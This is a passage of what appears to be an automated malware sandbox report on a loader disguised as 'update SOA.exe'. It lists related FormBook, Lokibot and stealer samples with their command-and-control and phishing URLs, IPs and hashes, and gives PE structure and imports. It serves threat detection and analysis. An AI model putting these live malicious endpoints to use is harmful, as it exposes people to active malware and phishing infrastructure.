                                                                                          PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.selftip.top/85su/
                                                                                          SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.zenscape.top/d8cw/
                                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.urbanpulse.help/r50h/
                                                                                          INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cenfresh.life/6iok/
                                                                                          31.31.196.17PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.dverkom.store/87kt/
                                                                                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.dverkom.store/87kt/
                                                                                          188.114.96.3docs.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                          https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                          • wwvmicrosx.live/office365/office_cookies/main/
                                                                                          http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                          • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                          http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                          • mobilelegendsmycode.com/favicon.ico
                                                                                          http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                          • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                          ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.chinaen.org/zi4g/
                                                                                          http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                                                                          • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                                                                          Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                          • www.444317.com/
                                                                                          Sept order.docGet hashmaliciousFormBookBrowse
                                                                                          • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                                                          1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                                          • dddotx.shop/Mine/PWS/fre.php

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          dxzz.topUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 137.175.33.56
                                                                                          DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                          • 137.175.33.56
                                                                                          www.cc101.proPO-100001499.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.97.3
                                                                                          PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.97.3
                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          www.dverkom.storePO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                          • 31.31.196.17
                                                                                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                          • 31.31.196.17

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUSNCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                          • 188.114.96.3
                                                                                          4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                          • 104.21.84.213
                                                                                          https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                          • 188.114.96.3
                                                                                          UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                          • 104.21.1.169
                                                                                          4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 188.114.96.3
                                                                                          gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                          • 188.114.96.3
                                                                                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                          • 188.114.96.3
                                                                                          docs.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                          • 104.18.35.212
                                                                                          https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          NAMECHEAP-NETUSshipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • 162.213.249.216
                                                                                          Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • 162.0.238.238
                                                                                          Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                          • 162.0.238.43
                                                                                          http://telegram-sex-naughty18.pages.dev/Get hashmaliciousPorn ScamBrowse
                                                                                          • 162.213.255.57
                                                                                          https://purtroppopurtroppo-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                                                          • 63.250.43.5
                                                                                          https://tuttavia-fab1fa.ingress-earth.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                                                          • 63.250.43.129
                                                                                          https://panthersaenimoine-fabc74.ingress-bonde.ewp.live/wp-content/plugins/abinbrevie/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                                                          • 63.250.43.2
                                                                                          https://urlz.fr/skxMGet hashmaliciousUnknownBrowse
                                                                                          • 63.250.43.1
                                                                                          Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                          • 162.0.238.43
                                                                                          http://www.hongkong-post.frairza.com/Get hashmaliciousUnknownBrowse
                                                                                          • 104.219.248.95
                                                                                          AS-REGRUfile.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                          • 194.58.114.223
                                                                                          file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                                          • 194.58.114.223
                                                                                          file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                          • 37.140.192.213
                                                                                          RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                          • 176.99.3.36
                                                                                          PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                          • 31.31.196.17
                                                                                          UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 194.58.112.174
                                                                                          CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                                                                          • 194.58.114.223
                                                                                          0435.pdf.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                          • 194.58.112.174
                                                                                          AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                          • 194.58.112.174
                                                                                          PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                          • 194.58.112.174
                                                                                          PEGTECHINCUShttps://ole798.com/Get hashmaliciousUnknownBrowse
                                                                                          • 192.74.233.14
                                                                                          https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                                                          • 107.149.163.248
                                                                                          https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                                                                                          • 137.175.84.167
                                                                                          https://tiktoksh0p.net/Get hashmaliciousUnknownBrowse
                                                                                          • 104.37.215.2
                                                                                          UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 137.175.33.56
                                                                                          https://tk815.shop/Get hashmaliciousUnknownBrowse
                                                                                          • 107.148.46.163
                                                                                          DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                          • 137.175.33.56
                                                                                          r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                          • 192.74.233.8
                                                                                          Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                                                          • 107.148.62.45
                                                                                          PO00211240906.exeGet hashmaliciousFormBookBrowse
                                                                                          • 107.148.62.45

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Temp\K4394f5

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\notepad.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\teer

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\update SOA.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):288768
                                                                                          Entropy (8bit):7.993824652984272
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:3mUWxi7Bi+NitVZE3wCDu6TLYf/FKUegyldqx:31jBigiZE3w8u6TLYfK0
                                                                                          MD5:87680CE0F1813F50179FDE5449C057B5
                                                                                          SHA1:A4551A0B460B716B88BE1495412BA53D4F14D747
                                                                                          SHA-256:77FDD27A7D3DAFDBBB21B431676A5EF44D3ECBC3B04C383FBFDFC6582213D6E6
                                                                                          SHA-512:C68D5C2469DC2900B65E11E2DE0D7BC3D5A5E9945AA720254339F02801DD8B22984609AD2AE49603F9E8B97524DAFC2F2D703FB3895982272C3D008ABCFB3C10
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:}..e.QJ7R...Q.....QI..k6P...Z7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7.QJ7\W.;X.9.{.F.... *Fx%B8=E&<jT3&-Z,uR2zE2?j^<h.z.u]8>Ri\G=vHC5XU0W#6N.wW5.~U?..7=.]...h($.B.fW .P....U?.b>9_z1-.RHC5XU0W.rGQ.6SH...0WZ7GQJ7.HA4ST;WZaCQJ7RHC5XU.DZ7GAJ7R8G5XUpWZ'GQJ5RHE5XU0WZ7AQJ7RHC5X%4WZ5GQJ7RHA5..0WJ7GAJ7RHS5XE0WZ7GQZ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5v!U/.7GQ~cVHC%XU0.^7GAJ7RHC5XU0WZ7GQj7R(C5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQJ7RHC5XU0WZ7GQ

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.551097037711219
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:update SOA.exe
                                                                                          File size:1'401'959 bytes
                                                                                          MD5:309a3f5ca72ff071a0edd351eb3c6691
                                                                                          SHA1:64a06df557469bda25a3d3b6526a9e7eade67f63
                                                                                          SHA256:cad71f61562fdc34dafc567081d21ff6044322ff75b67c3b5172fba7f4ee1e5d
                                                                                          SHA512:077e1c99989b798471373d1950b924ccac9de73d8b3a5712c628422d5448027998427c51dfc7ca9c93e667968a123b3d60a760272e13953373a3004856aba057
                                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QL+wCkHqv5Cgq5ub/xUXx/daqLXG8PPGFN0:f3v+7/5QLnCkHqB42/CXSeX
                                                                                          TLSH:5155F212B7D680B6DDA339B11937E36BDB3575194323C4CBA7E02E768F211509B3A362
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                          File Icon

                                                                                          Icon Hash:1733312925935517

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x416310
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:0
                                                                                          File Version Major:5
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          call 00007FBBDC95280Ch
                                                                                          jmp 00007FBBDC9465DEh
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push edi
                                                                                          push esi
                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                          mov eax, ecx
                                                                                          mov edx, ecx
                                                                                          add eax, esi
                                                                                          cmp edi, esi
                                                                                          jbe 00007FBBDC94676Ah
                                                                                          cmp edi, eax
                                                                                          jc 00007FBBDC94690Ah
                                                                                          cmp ecx, 00000100h
                                                                                          jc 00007FBBDC946781h
                                                                                          cmp dword ptr [004A94E0h], 00000000h
                                                                                          je 00007FBBDC946778h
                                                                                          push edi
                                                                                          push esi
                                                                                          and edi, 0Fh
                                                                                          and esi, 0Fh
                                                                                          cmp edi, esi
                                                                                          pop esi
                                                                                          pop edi
                                                                                          jne 00007FBBDC94676Ah
                                                                                          pop esi
                                                                                          pop edi
                                                                                          pop ebp
                                                                                          jmp 00007FBBDC946BCAh
                                                                                          test edi, 00000003h
                                                                                          jne 00007FBBDC946777h
                                                                                          shr ecx, 02h
                                                                                          and edx, 03h
                                                                                          cmp ecx, 08h
                                                                                          jc 00007FBBDC94678Ch
                                                                                          rep movsd
                                                                                          jmp dword ptr [00416494h+edx*4]
                                                                                          nop
                                                                                          mov eax, edi
                                                                                          mov edx, 00000003h
                                                                                          sub ecx, 04h
                                                                                          jc 00007FBBDC94676Eh
                                                                                          and eax, 03h
                                                                                          add ecx, eax
                                                                                          jmp dword ptr [004163A8h+eax*4]
                                                                                          jmp dword ptr [004164A4h+ecx*4]
                                                                                          nop
                                                                                          jmp dword ptr [00416428h+ecx*4]
                                                                                          nop
                                                                                          mov eax, E4004163h
                                                                                          arpl word ptr [ecx+00h], ax
                                                                                          or byte ptr [ecx+eax*2+00h], ah
                                                                                          and edx, ecx
                                                                                          mov al, byte ptr [esi]
                                                                                          mov byte ptr [edi], al
                                                                                          mov al, byte ptr [esi+01h]
                                                                                          mov byte ptr [edi+01h], al
                                                                                          mov al, byte ptr [esi+02h]
                                                                                          shr ecx, 02h
                                                                                          mov byte ptr [edi+02h], al
                                                                                          add esi, 03h
                                                                                          add edi, 03h
                                                                                          cmp ecx, 08h
                                                                                          jc 00007FBBDC94672Eh

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [ASM] VS2008 SP1 build 30729
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                          • [ C ] VS2005 build 50727
                                                                                          • [IMP] VS2005 build 50727
                                                                                          • [ASM] VS2008 build 21022
                                                                                          • [RES] VS2008 build 21022
                                                                                          • [LNK] VS2008 SP1 build 30729

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                          RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                          RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                          RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                          RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                          RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                          RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                          RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                          RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                          RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                          RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                          RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                          RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                          RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                          RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                          RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                          RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                          RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                          RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                          RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                          RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                          RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                          RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                          RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                          RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                          Imports

                                                                                          DLLImport
                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
